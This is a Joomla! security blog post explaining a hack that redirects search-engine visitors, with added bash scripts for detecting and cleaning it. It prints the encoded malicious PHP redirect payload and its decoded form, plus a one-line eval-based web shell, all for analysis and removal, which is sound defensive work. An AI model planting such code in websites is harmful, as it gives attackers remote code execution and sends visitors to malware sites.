Joomla! organic redirect hack

Post: 26 October 2012 by kriss in: Security

If you have a Joomla! website and your visitors complain about being redirected to suspicious websites when trying to reach you, first do what they are doing: search for your website on Google. Chances are you will find it, but clicking the result sends you to another website, usually a spam or malware site.

Once the problem has been confirmed, inspect your PHP files: you will most likely find that the same line of code has been injected into each of them, right after the first <?php.

This line looks like the following:

    eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJteXNwYWNlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9scGlzdHcuNHB1LmNvbS8iKTsKZXhpdCgpOw0KfQp9DQp9DQp9DQp9"));

Which decodes to the following (the first statement, error_reporting(0);, is part of the base64 payload above; it is what keeps the injected code from leaving PHP notices in your error log when the Referer or User-Agent headers are absent):

    error_reporting(0);                       // hide any PHP notices the code itself would raise
    $qazplm=headers_sent();
    if (!$qazplm){                            // only if a Location header can still be sent
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
    if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){   // spares IE 6 and IE 7 only
    if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler")
        or stristr($referer,"gogo") or stristr($referer,"live.com") or stristr($referer,"aport")
        or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru")
        or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com")
        or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer)
        or preg_match ("/google\.(.*?)\/url\?sa/",$referer)
        or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
    if (!stristr($referer,"cache") or !stristr($referer,"inurl")){  // false only if the Referer contains both words
    header("Location: http://lpistw.4pu.com/");
    exit();
    }
    }
    }
    }
    }

Reading this code explains why the hack is hard to uncover: the injected code redirects a visitor only when all of the following conditions hold:

  • no output has been sent yet (headers_sent() is false), so a Location header can still be emitted;
  • the visitor sends a User-Agent header, and it is not Internet Explorer 6 or 7 (every other browser, newer IE versions included, is a target);
  • and the Referer names one of the listed search engines (Google result links matching google.*/url?sa, Yahoo, Bing, Yandex searches, Rambler, AOL, live.com and several Russian engines), social networks (Facebook, MySpace, StumbleUpon) or URL shorteners (bit.ly, tinyurl.com).

The last check, which appears to exempt referers containing "cache" or "inurl", joins the two tests with or, so it only excludes a Referer that contains both words; in practice nearly every matching visitor is redirected.

You may well have been affected for a long time and only noticed it now, because you never met those conditions yourself: most site owners reach their own website by typing its URL or following a bookmark, which sends no Referer at all and therefore never triggers the redirect.
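To confirm the infection without waiting for a Google result to misbehave, you can request the site yourself with the headers a search-engine visitor sends. The following bash script is an added example and is not part of the original post: it fetches the site once plainly and once with a Firefox User-Agent plus a Google results Referer (which satisfy the conditions listed above), and reports when only the second request gets a redirect. It assumes curl is installed and that the site URL is supplied by the caller; the header dumps used to exercise redirect_target are constructed for the demonstration.

```shell
#!/usr/bin/env bash
# Added example, not part of the original post: request the site with the
# headers a search-engine visitor sends and compare with a plain request.
# Assumes curl is installed; the site URL is passed by the caller.

# Print the Location target from a raw response-header dump (argument 1,
# CRLF line endings tolerated) and return 0 when the status is a redirect;
# print nothing and return 1 otherwise.
redirect_target() {
  local headers="$1" status
  status=$(printf '%s\n' "$headers" | head -n 1 | awk '{ print $2 }')
  case "$status" in
    301|302|303|307|308)
      printf '%s\n' "$headers" | tr -d '\r' \
        | awk 'tolower($1) == "location:" { print $2; exit }'
      return 0 ;;
  esac
  return 1
}

# Fetch only the response headers of $1, passing any extra curl options that
# follow it. The User-Agent is Firefox, so it is not one of the two IE
# versions the injected code spares. curl does not follow redirects unless
# -L is given, so the first Location header is what comes back.
fetch_headers() {
  local url="$1"; shift
  curl -sS -o /dev/null -D - \
    -A 'Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0' \
    "$@" "$url"
}

# Compare a plain visit with one carrying a Google results Referer, which
# matches the google\.(.*?)\/url\?sa pattern in the decoded code. A site that
# redirects only (or elsewhere) when that Referer is present is infected;
# an ordinary www/https redirect shows up in both requests and is ignored.
probe_site() {
  local url="$1" plain se plain_target se_target
  plain=$(fetch_headers "$url")
  se=$(fetch_headers "$url" -e "https://www.google.com/url?sa=t&url=$url")
  plain_target=$(redirect_target "$plain") || true
  se_target=$(redirect_target "$se") || true
  if [ -n "$se_target" ] && [ "$se_target" != "$plain_target" ]; then
    printf 'SUSPICIOUS: %s sends search-engine visitors to %s\n' "$url" "$se_target"
    return 1
  fi
  printf 'OK: %s answers the same with and without a search-engine Referer\n' "$url"
}

# Usage (hypothetical address): probe_site http://www.example.com/
```

Run probe_site against the front page and a few deep links; since every PHP file carries the injection, any page should behave the same. Swapping the -e value for a Bing or Yahoo URL exercises the other branches of the referer check.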

At this point, realize that to modify your site this deeply, the attacker must first have got a backdoor onto your server, which let them rewrite every PHP file. Typically, the attacker guessed your administrator password, used the account to upload a malicious PHP script, and then ran that script to alter all your files. You will probably find PHP files in your public asset folders. In two cases we observed, the images folder contained a 69-byte file called post.php with the following contents:

    <?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>

Although this kind of file looks trivial, it gives arbitrary code execution on your server to anyone who can reach it: a single POST request whose php parameter holds a base64-encoded PHP snippet is enough, with no authentication at all. It should be removed immediately. Remember that you should never see PHP files in the images, media, tmp, cache and administrator/cache folders (or their subfolders) of a Joomla! website.

Before cleaning the rest of the website, take some safety measures so that the attacker cannot simply come back. The first is to change all your passwords, since, as explained above, the administrator account was probably compromised. A safer measure is to create another Super Administrator account with an uncommon name, such as pablo1234, and disable the default administrator account. While at it, double-check that no suspicious administrator, or even regular user, accounts have been created.

The second is to check the server logs to find any other backdoors in other locations. Typically, a run of POST requests at the time the infection appeared is suspicious. Systematically inspect the requested files, and be especially wary of the combination of eval() and $_POST. You may also consider contacting your hosting provider for support: some have tools that automatically scan your account and may help you detect threats in your files.
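As an added example, not from the original post, here is a small bash toolkit for the two checks described above: it scans an Apache combined-format access log for POST requests to PHP files inside Joomla!'s asset folders, lists which client addresses sent bursts of POSTs and when, and searches the document root for PHP files that sit in those folders or that feed request data into eval(). The log lines and file tree it is exercised against are constructed for the demonstration; the addresses and paths are made up.

```shell
#!/usr/bin/env bash
# Added example, not part of the original post. Works on Apache "combined"
# access logs and a Joomla! document root; all sample data is constructed.

# Joomla! folders that hold only assets and must never contain PHP files.
NO_PHP_DIRS='images media tmp cache administrator/cache'

# Print every POST request whose target is a .php file inside one of the
# folders above (the web shell images/post.php from the post would show here).
# Arguments: one or more access log files.
suspicious_posts() {
  awk -v dirs="$NO_PHP_DIRS" '
    BEGIN { n = split(dirs, d, " ") }
    $6 == "\"POST" {
      path = $7; sub(/\?.*/, "", path)          # drop the query string
      if (path !~ /\.php$/) next
      for (i = 1; i <= n; i++)
        if (index(path, "/" d[i] "/") > 0) { print; break }
    }' "$@"
}

# Count POST requests per client address and hour, busiest first. A burst
# from a single address around the time the redirect appeared is usually the
# attacker driving the backdoor.
post_bursts() {
  awk '$6 == "\"POST" { c[$1 " " substr($4, 2, 14)]++ }
       END { for (k in c) print c[k], k }' "$@" | sort -rn
}

# List backdoor candidates under the document root $1: PHP files inside the
# asset folders, plus any PHP file that passes request data into eval().
find_backdoors() {
  local root="$1" d
  {
    for d in $NO_PHP_DIRS; do
      [ -d "$root/$d" ] && find "$root/$d" -type f -name '*.php'
    done
    grep -rlE --include='*.php' 'eval *\(.*\$_(POST|GET|REQUEST|COOKIE)' "$root" || true
  } | sort -u
}

# Usage (hypothetical paths):
#   suspicious_posts /var/log/apache2/access.log
#   post_bursts /var/log/apache2/access.log | head
#   find_backdoors /var/www/html
```

Inspect every file find_backdoors reports before deleting it: a few extensions do call eval() legitimately, but none of them should do so on raw request data, and none belong in the asset folders.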

Thirdly and lastly, if you have to do it yourself, cleaning the hack can be seen as both difficult and easy.
Difficult, because all your PHP files may have the line of malicious code injected, and since we are talking about a Joomla! website, this represents a lot of files that you don't want to clean manually.
Easy, because the hacker injected exactly the same line of code in each file, meaning that you can easily write a script to find it in all your files, and clean them all at once.
If you have a backup that you are certain predates the infection, and losing the data added since then is acceptable, restoring it is also a good option; the backdoor removal and password changes above are still required, or the attacker will simply come back.
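The cleanup script described above, as an added example in bash (it is not the author's script): it lists the PHP files carrying the injected statement, recognising it by the first characters of the base64 string shown earlier (DQplcnJvcl9yZXBvcnRpbmcoMCk7, the encoding of error_reporting(0)) so that extensions which legitimately call base64_decode() are left alone, archives those files before touching them, and then strips the eval(base64_decode("…")); statement whether it was appended to the <?php line or placed on a line of its own. It assumes a Linux host with grep, sed and tar; the document root and backup paths are whatever you pass in, and the files it is exercised on are constructed for the demonstration.

```shell
#!/usr/bin/env bash
# Added example, not from the original post: locate and strip the injected
# eval(base64_decode("...")); statement from every PHP file under a Joomla!
# document root. Run list_infected first as a dry run; paths are assumptions.

# Signature of this specific injection: the start of its base64 payload,
# which decodes to "\r\nerror_reporting(0);". Matching on it avoids touching
# code that calls base64_decode() for legitimate reasons.
SIG='eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7'
# The whole statement as a sed basic regular expression (parentheses and
# quotes are literal in BRE; the bracket class covers the base64 alphabet).
RE='eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7[A-Za-z0-9+/=]*"));'

# Print the PHP files under $1 that contain the injected statement.
list_infected() {
  grep -rlF --include='*.php' "$SIG" "$1" || true
}

# Archive the infected files under $1 into the tar.gz $2, then remove the
# statement from each of them in place. A line holding nothing but the
# statement is deleted; otherwise (e.g. "<?php eval(...);") only the
# statement is cut out. Files are rewritten through cat so ownership and
# permissions survive. Prints the number of files cleaned.
clean_infected() {
  local root="$1" backup="$2" files tmp n
  files=$(list_infected "$root")
  [ -n "$files" ] || { echo 0; return 0; }
  printf '%s\n' "$files" | tar -czf "$backup" -T -
  n=$(printf '%s\n' "$files" | grep -c .)
  tmp=$(mktemp)
  printf '%s\n' "$files" | while IFS= read -r f; do
    sed -e "\\%^[[:space:]]*${RE}[[:space:]]*\$%d" \
        -e "s%${RE}%%" "$f" > "$tmp" && cat "$tmp" > "$f"
  done
  rm -f "$tmp"
  echo "$n"
}

# Usage (hypothetical paths):
#   list_infected /var/www/html
#   clean_infected /var/www/html /root/infected-files-backup.tgz
```

After the run, list_infected should print nothing; if a different base64 prefix turns up in a later infection, change SIG and RE to match it rather than loosening them to any eval(base64_decode( call.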

After that, you should have got rid of this hack. One last thing remains if Google has flagged your website for malware: submit a reconsideration request via your Google Webmaster Tools account. It may take a few days, but keep faith and you will eventually get back into their index. And of course, don't forget to back up your website often, and upgrade Joomla! and its extensions regularly.